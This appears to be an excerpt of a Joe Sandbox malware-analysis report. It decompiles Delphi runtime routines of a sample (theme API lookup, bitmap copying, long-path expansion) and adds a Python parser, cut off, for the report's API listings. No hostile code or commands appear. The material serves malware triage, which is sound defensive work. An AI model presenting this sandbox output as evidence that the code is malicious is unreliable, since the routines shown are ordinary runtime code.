                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                    • API String ID: 2238633743-2910565190
                                                    • Opcode ID: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                    • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                    • Opcode Fuzzy Hash: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                    • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00429040(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
                                                    				struct HBITMAP__* _v8;
                                                    				struct HPALETTE__* _v12;
                                                    				struct HPALETTE__* _v16;
                                                    				struct HPALETTE__* _v20;
                                                    				void* _v24;
                                                    				struct HDC__* _v28;
                                                    				struct HDC__* _v32;
                                                    				struct HDC__* _v36;
                                                    				BITMAPINFO* _v40;
                                                    				void* _v44;
                                                    				intOrPtr _v48;
                                                    				struct tagRGBQUAD _v52;
                                                    				struct HPALETTE__* _v56;
                                                    				intOrPtr _v116;
                                                    				intOrPtr _v120;
                                                    				intOrPtr _v132;
                                                    				intOrPtr _v136;
                                                    				void _v140;
                                                    				struct tagRECT _v156;
                                                    				void* __ebx;
                                                    				void* __ebp;
                                                    				signed short _t229;
                                                    				int _t281;
                                                    				signed int _t290;
                                                    				signed short _t292;
                                                    				struct HBRUSH__* _t366;
                                                    				struct HPALETTE__* _t422;
                                                    				signed int _t441;
                                                    				intOrPtr _t442;
                                                    				intOrPtr _t444;
                                                    				intOrPtr _t445;
                                                    				void* _t455;
                                                    				void* _t457;
                                                    				void* _t459;
                                                    				intOrPtr _t460;
                                                    
                                                    				_t457 = _t459;
                                                    				_t460 = _t459 + 0xffffff68;
                                                    				_push(_t419);
                                                    				_v16 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_v20 = 0;
                                                    				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
                                                    					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
                                                    						E00428BFC(_v8);
                                                    						_v116 = 0;
                                                    						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
                                                    							L00425F40();
                                                    						}
                                                    						_v28 = E00426060(GetDC(0));
                                                    						_v32 = E00426060(CreateCompatibleDC(_v28));
                                                    						_push(_t457);
                                                    						_push(0x42968e);
                                                    						_push( *[fs:edx]);
                                                    						 *[fs:edx] = _t460;
                                                    						if( *(_a8 + 0x18) >= 0x28) {
                                                    							_v40 = E0040275C(0x42c);
                                                    							_push(_t457);
                                                    							_push(0x429398);
                                                    							_push( *[fs:edx]);
                                                    							 *[fs:edx] = _t460;
                                                    							 *(_a8 + 0x18) = 0x28;
                                                    							 *((short*)(_a8 + 0x24)) = 1;
                                                    							if( *(_a8 + 0x26) == 0) {
                                                    								_t290 = GetDeviceCaps(_v28, 0xc);
                                                    								_t292 = GetDeviceCaps(_v28, 0xe);
                                                    								_t419 = _t290 * _t292;
                                                    								 *(_a8 + 0x26) = _t290 * _t292;
                                                    							}
                                                    							memcpy(_v40, _a8 + 0x18, 0xa << 2);
                                                    							 *(_a8 + 4) =  *(_a8 + 0x1c);
                                                    							_t441 = _a8;
                                                    							 *(_t441 + 8) =  *(_a8 + 0x20);
                                                    							if( *(_a8 + 0x26) > 8) {
                                                    								_t229 =  *(_a8 + 0x26);
                                                    								if(_t229 == 0x10) {
                                                    									L30:
                                                    									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
                                                    										E00428FF4(_a8);
                                                    										_t104 =  &(_v40->bmiColors); // 0x29
                                                    										_t441 = _t104;
                                                    										E004029DC(_a8 + 0x40, 0xc, _t441);
                                                    									}
                                                    								} else {
                                                    									_t441 = _a8;
                                                    									if(_t229 == 0x20) {
                                                    										goto L30;
                                                    									}
                                                    								}
                                                    							} else {
                                                    								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
                                                    									if(_v16 == 0) {
                                                    										if(_v8 != 0) {
                                                    											_v24 = SelectObject(_v32, _v8);
                                                    											if(_v116 <= 0 || _v120 == 0) {
                                                    												asm("cdq");
                                                    												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
                                                    											} else {
                                                    												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
                                                    												_t441 = _a8;
                                                    												 *(_t441 + 0x38) = _t281;
                                                    											}
                                                    											SelectObject(_v32, _v24);
                                                    										}
                                                    									} else {
                                                    										_t76 =  &(_v40->bmiColors); // 0x29
                                                    										_t441 = _t76;
                                                    										E004267F4(_v16, 0xff, _t441);
                                                    									}
                                                    								} else {
                                                    									_t441 = 0;
                                                    									_v40->bmiColors = 0;
                                                    									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
                                                    								}
                                                    							}
                                                    							_v20 = E00426060(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
                                                    							if(_v44 == 0) {
                                                    								L00425FB8(_t419);
                                                    							}
                                                    							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
                                                    								_pop(_t442);
                                                    								 *[fs:eax] = _t442;
                                                    								_push(0x42939f);
                                                    								return E0040277C(_v40);
                                                    							} else {
                                                    								asm("cdq");
                                                    								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
                                                    								E00404424();
                                                    								E00404424();
                                                    								goto L58;
                                                    							}
                                                    						} else {
                                                    							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
                                                    								_v20 = E00426060(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
                                                    							} else {
                                                    								_v20 = E00426060(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
                                                    							}
                                                    							E00426060(_v20);
                                                    							_v24 = E00426060(SelectObject(_v32, _v20));
                                                    							_push(_t457);
                                                    							_push(0x42963f);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t460;
                                                    							_push(_t457);
                                                    							_push(0x42962e);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t460;
                                                    							_v56 = 0;
                                                    							_t422 = 0;
                                                    							if(_v16 != 0) {
                                                    								_v56 = SelectPalette(_v32, _v16, 0);
                                                    								RealizePalette(_v32);
                                                    							}
                                                    							_push(_t457);
                                                    							_push(0x42960c);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t460;
                                                    							if(_a4 == 0) {
                                                    								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
                                                    							} else {
                                                    								_t366 = E00425610( *((intOrPtr*)(_a4 + 0x14)));
                                                    								E00419804( *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
                                                    								FillRect(_v32,  &_v156, _t366);
                                                    								SetTextColor(_v32, E00424950( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                                                    								SetBkColor(_v32, E00424950(E004255D4( *((intOrPtr*)(_a4 + 0x14)))));
                                                    								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
                                                    									_v52 = E00424950( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
                                                    									_v48 = E00424950(E004255D4( *((intOrPtr*)(_a4 + 0x14))));
                                                    									SetDIBColorTable(_v32, 0, 2,  &_v52);
                                                    								}
                                                    							}
                                                    							if(_v8 == 0) {
                                                    								_pop(_t444);
                                                    								 *[fs:eax] = _t444;
                                                    								_push(0x429613);
                                                    								if(_v16 != 0) {
                                                    									return SelectPalette(_v32, _v56, 0xffffffff);
                                                    								}
                                                    								return 0;
                                                    							} else {
                                                    								_v36 = E00426060(CreateCompatibleDC(_v28));
                                                    								_push(_t457);
                                                    								_push(0x4295e2);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t460;
                                                    								_t455 = E00426060(SelectObject(_v36, _v8));
                                                    								if(_v12 != 0) {
                                                    									_t422 = SelectPalette(_v36, _v12, 0);
                                                    									RealizePalette(_v36);
                                                    								}
                                                    								if(_a4 != 0) {
                                                    									SetTextColor(_v36, E00424950( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                                                    									SetBkColor(_v36, E00424950(E004255D4( *((intOrPtr*)(_a4 + 0x14)))));
                                                    								}
                                                    								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
                                                    								if(_v12 != 0) {
                                                    									SelectPalette(_v36, _t422, 0xffffffff);
                                                    								}
                                                    								E00426060(SelectObject(_v36, _t455));
                                                    								_pop(_t445);
                                                    								 *[fs:eax] = _t445;
                                                    								_push(0x4295e9);
                                                    								return DeleteDC(_v36);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						goto L58;
                                                    					}
                                                    				} else {
                                                    					L58:
                                                    					return _v20;
                                                    				}
                                                    			}
                                                    0x00429106
                                                    0x00429118
                                                    0x0042915c
                                                    0x0042911a
                                                    0x00429138
                                                    0x00429138
                                                    0x004293a2
                                                    0x004293b9
                                                    0x004293be
                                                    0x004293bf
                                                    0x004293c4
                                                    0x004293c7
                                                    0x004293cc
                                                    0x004293cd
                                                    0x004293d2
                                                    0x004293d5
                                                    0x004293da
                                                    0x004293dd
                                                    0x004293e3
                                                    0x004293f4
                                                    0x004293fb
                                                    0x004293fb
                                                    0x00429402
                                                    0x00429403
                                                    0x00429408
                                                    0x0042940b
                                                    0x00429412
                                                    0x004294e8
                                                    0x00429418
                                                    0x0042941e
                                                    0x0042943c
                                                    0x0042944c
                                                    0x00429464
                                                    0x0042947e
                                                    0x0042948b
                                                    0x004294a4
                                                    0x004294b7
                                                    0x004294c6
                                                    0x004294c6
                                                    0x0042948b
                                                    0x004294f1
                                                    0x004295eb
                                                    0x004295ee
                                                    0x004295f1
                                                    0x004295fa
                                                    0x00000000
                                                    0x00429606
                                                    0x0042960b
                                                    0x004294f7
                                                    0x00429505
                                                    0x0042950a
                                                    0x0042950b
                                                    0x00429510
                                                    0x00429513
                                                    0x00429528
                                                    0x0042952e
                                                    0x0042953f
                                                    0x00429545
                                                    0x00429545
                                                    0x0042954e
                                                    0x00429563
                                                    0x0042957d
                                                    0x0042957d
                                                    0x004295a5
                                                    0x004295ae
                                                    0x004295b7
                                                    0x004295b7
                                                    0x004295c6
                                                    0x004295cd
                                                    0x004295d0
                                                    0x004295d3
                                                    0x004295e1
                                                    0x004295e1
                                                    0x004294f1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00429695
                                                    0x00429695
                                                    0x0042969e
                                                    0x0042969e

                                                    APIs
                                                    • GetObjectA.GDI32(00000000,00000054,?), ref: 004290C0
                                                    • GetDC.USER32(00000000), ref: 004290D1
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 004290E2
                                                    • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0042912E
                                                    • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 00429152
                                                    • SelectObject.GDI32(?,?), ref: 004293AF
                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 004293EF
                                                    • RealizePalette.GDI32(?), ref: 004293FB
                                                    • SetTextColor.GDI32(?,00000000), ref: 00429464
                                                    • SetBkColor.GDI32(?,00000000), ref: 0042947E
                                                    • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,?,00000000,00000000,0042960C,?,00000000,0042962E), ref: 004294C6
                                                    • FillRect.USER32 ref: 0042944C
                                                      • Part of subcall function 00424950: GetSysColor.USER32(?), ref: 0042495A
                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 004294E8 (raster op 0x00FF0062 = WHITENESS)
                                                    • CreateCompatibleDC.GDI32(00000028), ref: 004294FB
                                                    • SelectObject.GDI32(?,00000000), ref: 0042951E
                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 0042953A
                                                    • RealizePalette.GDI32(?), ref: 00429545
                                                    • SetTextColor.GDI32(?,00000000), ref: 00429563
                                                    • SetBkColor.GDI32(?,00000000), ref: 0042957D
                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004295A5 (raster op 0x00CC0020 = SRCCOPY)
                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 004295B7
                                                    • SelectObject.GDI32(?,00000000), ref: 004295C1
                                                    • DeleteDC.GDI32(?), ref: 004295DC
                                                      • Part of subcall function 00425610: CreateBrushIndirect.GDI32(?), ref: 004256BA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                    • String ID:
                                                    • API String ID: 1299887459-0
                                                    • Opcode ID: 519235494466fc4cf2ec32487541d526bf075bba547cee6414a3c64769236d7f
                                                    • Instruction ID: 7759fe5d4c3796b98261a3e37b615e13e57611603d3437bbdafc9af0f78bd738
                                                    • Opcode Fuzzy Hash: 519235494466fc4cf2ec32487541d526bf075bba547cee6414a3c64769236d7f
                                                    • Instruction Fuzzy Hash: 5A120E71A00218AFDB10DF99D985F9EB7F8EB08314F51845AF918EB291C778ED40CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			/* Matches the Delphi RTL routine ToLongPath (System.pas): if kernel32 does not export
                                                    			   GetLongPathNameA, each path component is expanded with FindFirstFileA into a
                                                    			   MAX_PATH+1 (0x105) byte buffer, handling drive paths and \\server\share UNC paths.
                                                    			   The "Software\Borland\Locales" string in the call context is the RTL's
                                                    			   resource-module lookup, which calls this routine. Runtime boilerplate, not
                                                    			   sample-specific logic. */
                                                    			E00406018(char* __eax, intOrPtr __edx) {
                                                    				char* _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				struct _WIN32_FIND_DATAA _v334;
                                                    				char _v595;
                                                    				void* _t45;
                                                    				char* _t54;
                                                    				char* _t64;
                                                    				void* _t83;
                                                    				intOrPtr* _t84;
                                                    				char* _t90;
                                                    				struct HINSTANCE__* _t91;
                                                    				char* _t93;
                                                    				void* _t94;
                                                    				char* _t95;
                                                    				void* _t96;
                                                    
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_v16 = _v8;
                                                    				_t91 = GetModuleHandleA("kernel32.dll");
                                                    				if(_t91 == 0) {
                                                    					L4:
                                                    					if( *_v8 != 0x5c) {
                                                    						_t93 = _v8 + 2;
                                                    						goto L10;
                                                    					} else {
                                                    						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                    							_t95 = E00406004(_v8 + 2);
                                                    							if( *_t95 != 0) {
                                                    								_t14 = _t95 + 1; // 0x1
                                                    								_t93 = E00406004(_t14);
                                                    								if( *_t93 != 0) {
                                                    									L10:
                                                    									_t83 = _t93 - _v8;
                                                    									_push(_t83 + 1);
                                                    									_push(_v8);
                                                    									_push( &_v595);
                                                    									L0040131C();
                                                    									while( *_t93 != 0) {
                                                    										_t90 = E00406004(_t93 + 1);
                                                    										_t45 = _t90 - _t93;
                                                    										if(_t45 + _t83 + 1 <= 0x105) {
                                                    											_push(_t45 + 1);
                                                    											_push(_t93);
                                                    											_push( &(( &_v595)[_t83]));
                                                    											L0040131C();
                                                    											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                    											if(_t94 != 0xffffffff) {
                                                    												FindClose(_t94);
                                                    												_t54 =  &(_v334.cFileName);
                                                    												_push(_t54);
                                                    												L00401324();
                                                    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                    													_push(0x105 - _t83 - 1);
                                                    													_push( &(_v334.cFileName));
                                                    													_push( &(( &(( &_v595)[_t83]))[1]));
                                                    													L0040131C();
                                                    													_t64 =  &(_v334.cFileName);
                                                    													_push(_t64);
                                                    													L00401324();
                                                    													_t83 = _t83 + _t64 + 1;
                                                    													_t93 = _t90;
                                                    													continue;
                                                    												}
                                                    											}
                                                    										}
                                                    										goto L17;
                                                    									}
                                                    									_push(_v12);
                                                    									_push( &_v595);
                                                    									_push(_v8);
                                                    									L0040131C();
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                    					if(_t84 == 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						_push(0x105);
                                                    						_push( &_v595);
                                                    						_push(_v8);
                                                    						if( *_t84() == 0) {
                                                    							goto L4;
                                                    						} else {
                                                    							_push(_v12);
                                                    							_push( &_v595);
                                                    							_push(_v8);
                                                    							L0040131C();
                                                    						}
                                                    					}
                                                    				}
                                                    				L17:
                                                    				return _v16;
                                                    			}

                                                    (Instruction address column for the C-code listing above: 0x00406024 to 0x004061ab, 81 entries. The extraction detached this column from the C-code lines it annotates, so only the addresses survive.)

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                    • lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
                                                    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                    • API String ID: 3245196872-1565342463
                                                    • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                    • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                    • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                    • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
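The "APIs" bullets above are the most useful part of each function record for triage, but the report orders some of them by API rather than by call site, and it mixes direct calls with "Part of subcall function" lines. The following parser for that bullet format is an added example, not part of the Joe Sandbox report or of the sample; the helper names are my own, and the two sample inputs are copied verbatim from the E00406018 listing above and from the GDI listing before it. It recovers call-site order from the ref addresses and flags string names passed to GetProcAddress, which is how E00406018 resolves GetLongPathNameA at runtime.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One bullet of a Joe Sandbox "APIs" listing, in the three shapes seen on the page:
#   • Api.MODULE(arg,arg,...), ref: ADDRESS
#   • Api.MODULE ref: ADDRESS                         (no argument list captured)
#   • Part of subcall function ADDR: Api.MODULE(...), ref: ADDRESS
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]       # raw argument column; "?" means unknown to the analyzer
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address for "Part of subcall function" lines


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse every bullet that matches the listing grammar; other lines are ignored."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall_of=int(sub, 16) if sub else None))
    return calls


def in_function_order(calls: List[ApiCall]) -> List[ApiCall]:
    """Direct calls sorted by call-site address, i.e. the order they occur in the code."""
    return sorted((c for c in calls if c.subcall_of is None), key=lambda c: c.ref)


def dynamically_resolved(calls: List[ApiCall]) -> List[str]:
    """Names passed to GetProcAddress as a string (dynamic API resolution).
    Unknown ("?") or hex-looking second arguments (ordinals, pointers) are skipped."""
    names = []
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2:
            target = c.args[1]
            if target != "?" and not HEX32.match(target):
                names.append(target)
    return names


# Constructed sample: the APIs bullets of E00406018 exactly as printed in the report.
TOLONGPATH_APIS = r"""
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
• GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
• lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
• lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
• lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
• FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
• lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
• lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
• lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
• lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
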